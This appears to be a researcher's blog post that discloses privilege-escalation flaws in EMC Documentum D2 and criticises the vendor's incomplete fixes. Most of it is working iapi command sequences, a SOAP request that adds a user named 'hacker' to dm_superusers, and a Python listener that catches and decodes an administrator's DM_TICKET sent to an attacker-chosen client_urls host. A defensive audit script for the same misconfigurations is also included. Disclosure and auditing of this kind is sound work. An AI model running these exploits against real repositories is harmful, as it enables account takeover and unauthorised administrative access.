Second dive into D2 security

Read the previous one first.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
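The capture above is the whole attack: whatever host is listed in d2_options.client_urls receives, in the query string, a login ticket for the account the method runs as. As an added example, not code from the post or from D2, the Python listener below can stand in for `nc -l 7777`: it parses the RefreshCache request line, pulls `_docbase`, `_username` and the DM_TICKET out of it, and base64-decodes as much of the ticket as is present. The ticket prefix shown on this page decodes to the plaintext lines `OBJ NULL 0`, `13`, `version`. The sample request line is constructed from the truncated capture above; the listener address and port are assumptions.

```python
"""Listener for the D2RefreshCacheMethod callback: parses the RefreshCache
request line and decodes the DM_TICKET it carries. Added example, not code
from the post or from D2; see the lead-in for what is constructed."""
import base64
import binascii
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# Constructed from the nc capture above; the ticket is truncated as in the post.
SAMPLE_REQUEST_LINE = (
    "GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin"
    "&_password=DM_TICKET%3DT0JKIE5VTEwgMAoxMwp2ZXJzaW9u... HTTP/1.1"
)


def parse_refresh_cache_request(request_line):
    """Return docbase, user name and ticket from a RefreshCache GET line,
    or None when the line carries no DM_TICKET password."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    query = parse_qs(urlsplit(parts[1]).query)
    password = query.get("_password", [""])[0]
    if not password.startswith("DM_TICKET="):
        return None
    return {
        "docbase": query.get("_docbase", [""])[0],
        "username": query.get("_username", [""])[0],
        "ticket": password[len("DM_TICKET="):],
    }


def ticket_header(ticket_b64):
    """Base64-decode as much of the ticket as survived (the post truncates it
    with '...') and return its plaintext header lines. The prefix on this page
    decodes to 'OBJ NULL 0', '13', 'version'."""
    usable = re.match(r"[A-Za-z0-9+/]*", ticket_b64).group(0)
    usable = usable[: len(usable) - len(usable) % 4]   # drop a partial quantum
    try:
        raw = base64.b64decode(usable, validate=True)
    except binascii.Error:
        return []
    return raw.decode("latin-1").split("\n")


class TicketCatcher(BaseHTTPRequestHandler):
    """Drop-in for `nc -l 7777`: answers 200 and prints any ticket seen."""

    def do_GET(self):
        found = parse_refresh_cache_request(self.requestline)
        if found:
            print("ticket for %s@%s: %s" % (found["username"], found["docbase"], found["ticket"]))
            print("header:", ticket_header(found["ticket"])[:3])
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):   # keep stdout to the ticket lines
        pass


if __name__ == "__main__":
    # Assumed listener address; put http://<this host>:7777/ into client_urls.
    HTTPServer(("127.0.0.1", 7777), TicketCatcher).serve_forever()
```

Run it on the host named in client_urls, then fire D2RefreshCacheMethod as above; the ticket is a login ticket for the method's own account (dmadmin in the capture), so it is usable with any DFC or iapi client until it expires.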

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute the method with SAVE_RESULTS=T, the saved result document hands us the user's ticket:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API> save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4
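The sections above share one pattern: a setting that an ordinary user is allowed to edit (a d2_acl_config object, d2_options.client_urls, d2_options.node_user_security_group) ends up deciding who is superuser. As an added example, not code from the post or from D2, the Python below parses `API> dump` output in the layout shown on this page and flags those conditions: dm_world holding more than NONE on the superuser ACL, a d2_acl_config that would grant dm_world WRITE or DELETE, an empty D2FS security group, and a client_urls entry pointing at a host outside an allowlist. The sample dumps are constructed from the objects on this page and trimmed; the superuser ACL sample shows dm_world at 7, which is what the `_permit` check at the end of the D2UpdateChildACLMethod section implies but the post does not dump directly, and the allowlisted host name is an assumption.

```python
"""Audit `API> dump` output for the D2 weaknesses walked through above.
Added example, not code from the post or from D2; samples are constructed."""
import re
from urllib.parse import urlsplit

ATTR_LINE = re.compile(r"^\s*(\w+)\s+(?:\[(\d*)\])?:\s?(.*)$")   # name [i]: value
CONT_LINE = re.compile(r"^\s+\[(\d+)\]:\s?(.*)$")                  #      [i]: value
PERMIT_NAMES = {1: "NONE", 2: "BROWSE", 3: "READ", 4: "RELATE",
                5: "VERSION", 6: "WRITE", 7: "DELETE"}            # Documentum basic permits


def parse_dump(text):
    """Turn the attribute lines of an iapi dump into a dict; repeating
    attributes ([0], [1], ... or '[]: <none>') become lists."""
    obj, current = {}, None
    for line in text.splitlines():
        m = CONT_LINE.match(line)
        if m and current is not None:
            obj[current].append(m.group(2).strip())
            continue
        m = ATTR_LINE.match(line)
        if not m:                      # section header or blank line
            current = None
            continue
        name, index, value = m.group(1), m.group(2), m.group(3).strip()
        if index is None:
            obj[name], current = value, None
        else:
            obj[name] = [] if value == "<none>" else [value]
            current = name
    return obj


def world_permit(acl):
    """Basic permit dm_world holds in a parsed dm_acl; 1 (NONE) if absent."""
    for name, permit in zip(acl.get("r_accessor_name", []), acl.get("r_accessor_permit", [])):
        if name == "dm_world":
            return int(permit)
    return 1


def audit_acl(acl, max_world_permit=1):
    """An ACL meant for administrators must not give dm_world anything."""
    p = world_permit(acl)
    if p > max_world_permit:
        return ["%s: dm_world has %s (%d)" % (acl.get("object_name"), PERMIT_NAMES.get(p, "?"), p)]
    return []


def audit_acl_config(cfg):
    """A d2_acl_config is what D2UpdateChildACLMethod pushes onto children;
    one that grants dm_world WRITE or DELETE is the rogue object above."""
    out = []
    for name, permit in zip(cfg.get("accessor_name", []), cfg.get("accessor_permit", [])):
        if name == "dm_world" and int(permit) >= 6:
            out.append("d2_acl_config %r grants dm_world %s"
                       % (cfg.get("object_name"), PERMIT_NAMES[int(permit)]))
    return out


def audit_d2_options(opts, allowed_hosts=("d2app.example.internal",)):  # allowlist is assumed
    """An empty D2FS security group removes the group check on that node
    (the savePropertiesRequest trick); a foreign client_urls host gets tickets."""
    out = []
    for attr in ("node_admin_security_group", "node_user_security_group",
                 "node_group_security_group"):
        if not opts.get(attr):
            out.append("%s is empty: D2FS edits of this node are not restricted" % attr)
    for url in opts.get("client_urls", []):
        host = urlsplit(url).hostname
        if host not in allowed_hosts:
            out.append("client_urls sends tickets to untrusted host %r (%s)" % (host, url))
    return out


# Constructed sample dumps, trimmed to the attributes the checks read.
SUPERUSER_ACL_DUMP = """USER ATTRIBUTES

  object_name                     : dm_acl_superusers
SYSTEM ATTRIBUTES

  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 7
                               [1]: 7
                               [2]: 7
"""
ROGUE_ACL_CONFIG_DUMP = """USER ATTRIBUTES

  object_name                     : ACL of superusers used for Docbase Administration
  accessor_name                [0]: dm_world
  accessor_permit              [0]: 7
  accessor_xpermit             [0]: 0
"""
D2_OPTIONS_DUMP = """USER ATTRIBUTES

  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                  [0]: http://localhost:7777/
  node_user_security_group        :
  node_group_security_group       : admingroup
"""


def audit_all():
    """Run every check over the samples; returns the list of findings."""
    return (audit_acl(parse_dump(SUPERUSER_ACL_DUMP))
            + audit_acl_config(parse_dump(ROGUE_ACL_CONFIG_DUMP))
            + audit_d2_options(parse_dump(D2_OPTIONS_DUMP)))
```

In practice you would feed it the dumps of every dm_acl whose owner is the repository owner, every d2_acl_config, and the single d2_options object; a d2_acl_config whose object_name equals the description of an administrative ACL is the tell for the first trick, and it is cheap to diff these objects against a known-good copy on a schedule.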

Is it worth treating the flu if the patient has cancer?

Here I described a vulnerability in the D2GetAdminTicketMethod docbase method. After that EMC released D2 4.2, where they started encrypting the return values passed through the c6_method_return object, but their solution was still vulnerable. Now, in D2 4.2.1, they have decided to treat the runny nose instead of raising the technology level of D2. Note that the security advisory is still not published:

which, according to the statements provided above, means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC coders neither know the product they are trying to develop nor read the documentation. Follow my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

This is already the second attempt to fix the D2GetAdminTicketMethod vulnerability, and the fix is still incomplete and wrong. What a shame: EMC has not managed to fix a high-severity vulnerability in five months.